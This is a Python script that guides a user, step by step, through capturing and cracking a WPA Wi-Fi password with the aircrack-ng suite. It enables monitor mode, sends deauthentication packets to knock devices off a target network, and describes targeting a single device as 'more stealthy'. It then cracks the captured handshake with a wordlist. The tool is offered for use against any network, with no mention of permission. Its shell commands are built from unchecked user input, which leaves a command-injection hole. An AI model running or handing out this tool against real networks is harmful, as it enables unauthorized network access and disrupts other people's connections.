#!/usr/bin/python3
import os,time
while True:
	try:
		def mainScreen():
			print ("""
\n
          _______ _________ _                   _______  _______  ________          _ 
|\     /|(  ___  )\__   __/( \        |\     /|(  ____ \(  ____ \/__   __/|\     /|( )
| )   ( || (   ) |   ) (   | (        | )   ( || (    \/| (    \/   ) (   ( \   / )| |
| (___) || (___) |   | |   | |        | | _ | || (__    | (_____    | |    \ (_) / | |
|  ___  ||  ___  |   | |   | |        | |( )| ||  __)   (_____  )   | |     \   /  | |
| (   ) || (   ) |   | |   | |        | || || || (            ) |   | |      ) (   (_)
| )   ( || )   ( |___) (___| (____/\  | () () || (____/\/\____) |   | |      | |    _ 
|/     \||/     \|\_______/(_______/  (_______)(_______/\_______)   )_(      \_/   (_)
\n                                                                                      
""")
			os.system("echo 'Starting...'")
			os.system("airmon-ng stop wlan1mon > log.txt && airmon-ng stop wlan0mon >> log.txt")
			print("\nHi, welcome to aircrack-ng made easy")
			print("Please read everything that appears at the bottom")
			print("Thanks for using this program")
			print("\nyour cards are: \n")
			os.system("airmon-ng | grep -i 'wlan*' | cut -d' ' -f 1 | awk -F ' ' {'print $2'}")
			print("\n")
			index = input("What card shall I put in monitor mode? wlan0 [enter 0] wlan1 [enter 1] etc >>")
			query = ("wlan"+"%s" %(index))
			query = str(query)
			os.system("airmon-ng start %s >> log.txt" %(query))
			print("\n1) Ok, seems like %s is started, time to get crackin'" %(query))
			print("\n2) now, we'll run Airodump-ng to capture the handshake")
			input("\n3) once you start airodump, you need to press ctrl+c when you see your target network. \npress enter to continue >>")
			os.system("airodump-ng -a %smon" %(query)) 
			print("\nOk, all I need is a few things from you")
			b = input("\nFirst, we'll create a new file to store the key in. What shall I call it? [no spaces]>>")
			b = str(b)
			c = input("\nNow, tell me the (copy/paste) channel {look at CH column} of the network [no spaces]>>")
			c = str(c)
			d = input("\nFinally tell me the (copy/paste) bssid of the network [no spaces]>>")
			d = str(d)
			if b and c and d != "":
				print("\nNow, the idea is when someone connects/reconnects, we grab the password")
				print("\nThat's why we need to disconnect someone. You dont have to, you can wait for someone to connect or connect manually")
				print("\nYou can leave it blank to not disconnect anyone")
				e = input("\nHow many de-auths/disconnects shall I send? >>")
				e = str(e)
				print("\nLook at the second column where it says bssid/station.")
				print("\nIn simple terms the bssid is the wifi access point and the station is a devices connected to that network.")
				print("\nYou can copy/paste a station address to de-auth/disconnect a specific device rather than all devices on the network")
				print("\nThis is a more stealthy as only one device is being disconnected.")
				print("\nplease ensure that the station (address) you copy/paste has the bssid you copied earlier [Look in the bssid column]")
				print("\nIt is optional but you can also leave this blank if you still don't get it")
				g = input("\nPlease copy/paste station (address) here or leave blank>>")
				g = str(g)
				if e != "" and g != "":
					input("\nPRESS ENTER TO RUN. ONCE YOU SEE WPA HANDSHAKE:%s AT THE TOP RIGHT PRESS CTRL+C!! THIS IS VITAL!! [press enter]>>" %(d))
					os.system("iwconfig %smon channel %s" %(query,c))
					os.system("xterm $HOLD -title 'DEAUTHING'  $TOPLEFTBIG -bg '#FFFFFF' -fg '#000000' $TOPLEFTBIG -bg '#FFFFFF' -fg '#000000' $TOPLEFTBIG -bg '#FFFFFF' -fg '#000000' -e aireplay-ng -0 %s -a %s -c %s %smon;airodump-ng -w %s -c %s --bssid %s %smon" %(e,d,g,query,b,c,d,query))
					print("\nIf you saw [wpa handshake:%s] at the top right,then its time to crack the handshake." %(d))
					print("\nFirst make sure you have a wordlist which has the password in it ")
					print("\nOnce you download or locate one press enter")
					print("\nHopefully the password will be in there or put it in there")
					f = input("\nDrag the wordlist on the terminal, literally!! use the file manager! >>")
					f = str(f)
					print("\nOk, ready? press enter to start cracking")
					print("\nIf nothing is found after a while then ctrl+c and try again with a different wordlist")
					input("\n[press enter]>>")
					os.system("aircrack-ng %s-01.cap -w %s" %(b,f))
					input("\n\nLOOK AT KEY FOUND, THAT'S THE PASSWORD. WRITE IT DOWN AND PRESS ENTER TO CLEANUP >>")
					print("\n Running cleanup..")
					os.system("airmon-ng stop %smon" %(query))
					os.system("rm log.txt")
					os.system("clear")
					print("CONGRATS IF YOU FIND THE PSK!")
					print("GOODBYE!")
					os._exit(1)
				elif e != "" and g == "":
					input("\nPRESS ENTER TO RUN. ONCE YOU SEE WPA HANDSHAKE:%s AT THE TOP RIGHT PRESS CTRL+C!! THIS IS VITAL!! \n[press enter]>>" %(d))
					os.system("iwconfig %smon channel %s" %(query,c))
					os.system("xterm $HOLD -title 'DEAUTHING'  $TOPLEFTBIG -bg '#FFFFFF' -fg '#000000' $TOPLEFTBIG -bg '#FFFFFF' -fg '#000000' $TOPLEFTBIG -bg '#FFFFFF' -fg '#000000' -e aireplay-ng -0 %s -a %s %smon;airodump-ng -w %s -c %s --bssid %s %smon" %(e,d,query,b,c,d,query))
					print("\nIf you saw [wpa handshake:%s] at the top right,then its time to crack the handshake." %(d))
					print("\nFirst make sure you have a wordlist which has the password in it ")
					print("\nOnce you download or locate one press enter")
					print("\nHopefully the password will be in there or put it in there")
					f = input("\nDrag the wordlist on the terminal, literally!! use the file manager! >>")
					f = str(f)
					print("\nOk, ready? press enter to start cracking")
					print("\nIf nothing is found then ctrl+c and try again")
					input("\n[press enter]>>")
					os.system("\naircrack-ng %s-01.cap -w %s" %(b,f))
					input("\n\nLOOK AT KEY FOUND, THAT'S THE PASSWORD. WRITE IT DOWN AND PRESS ENTER TO CLEANUP >>")
					print("\n Running cleanup..")
					os.system("airmon-ng stop %smon" %(query))
					os.system("rm log.txt")
					os.system("clear")
					print("CONGRATS IF YOU FIND THE PSK!")
					print("GOODBYE!")					
				else:
					print("\nOk, you have chosen not to disconnect anyone.")
					print("\nYou need to wait for someone to connect or connect manually yourself")
					input("\nReady? Hit enter to run. When you see WPA HANDSHAKE:%s at the top right press ctrl+c>>" %(d))
					os.system("\niwconfig %smon channel %s" %(query,c))
					os.system("\nairodump-ng -w %s -c %s --bssid %s %smon" %(b,c,d,query))
					print("\nIf you saw [wpa handshake:%s] at the top right,then its time to crack the handshake." %(d))
					print("\nFirst make sure you have a wordlist which has the password in it ")
					print("\nOnce you download or locate one press enter")
					print("\nHopefully the password will be in there or put it in there")
					f = input("\nDrag the wordlist on the terminal, literally!! use the file manager! >>")
					f = str(f)
					print("\nOk, ready? press enter to start cracking")
					print("\nIf nothing is found then ctrl+c and try again")
					input("\n[press enter]>>")
					os.system("aircrack-ng %s-01.cap -w %s" %(b,f))
					input("\n\nLOOK AT KEY FOUND, THAT'S THE PASSWORD. WRITE IT DOWN AND PRESS ENTER TO CLEANUP >>")
					print("\n Running cleanup..")
					os.system("airmon-ng stop %smon" %(query))
					os.system("rm log.txt")
					os.system("clear")
					print("CONGRATS IF YOU FIND THE PSK!")
					print("GOODBYE!")
					os._exit(1)
					
			else:
				input("You missed something, try again, \n[press enter]>>")
				mainScreen()
		mainScreen()
	except(KeyboardInterrupt,EOFError):
		print("\n Wait a few seconds, cleaning up...")
		os.system("airmon-ng stop wlan1mon >> log.txt;echo 'almost done';airmon-ng stop wlan0mon >> log.txt")
		os.system("clear")
		if input("\n Exit or return to start? press y to exit or any other key to return to start>>").lower().startswith("y"):
			os.system("rm log.txt")
			os._exit(1)
		else:
			os.system("clear")
			mainScreen()
			os.system("rm log.txt")
